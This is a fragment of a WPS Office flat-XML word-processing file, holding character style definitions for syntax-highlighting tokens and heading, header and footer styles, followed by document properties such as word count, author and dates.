    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="880000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="BB6688"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="BA2121"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="06287E"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="19177C"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="BC7A00"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="7D9029"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="74">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="15"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="75">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/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character" w:customStyle="1" w:styleId="76">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="335B8A" w:themeColor="accent1" w:themeShade="B5"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="77">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="21"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="5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customStyle="1" w:styleId="79">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"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1308</Words>
  <Characters>7458</Characters>
  <Lines>62</Lines>
  <Paragraphs>17</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8749</CharactersWithSpaces>
  <Application>WPS Office_3.0.2.4882_F1E327BC-269C-435d-A152-05C5408002CA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2020-11-06T18:20:00Z</dcterms:created>
  <dc:creator>shirohaethu</dc:creator>
  <cp:lastModifiedBy>shirohaethu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-29T19:50:08Z</dcterms:modified>
  <cp:revision>827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2052-3.0.2.4882</vt:lpwstr>
  </property>
</Properties>
</file>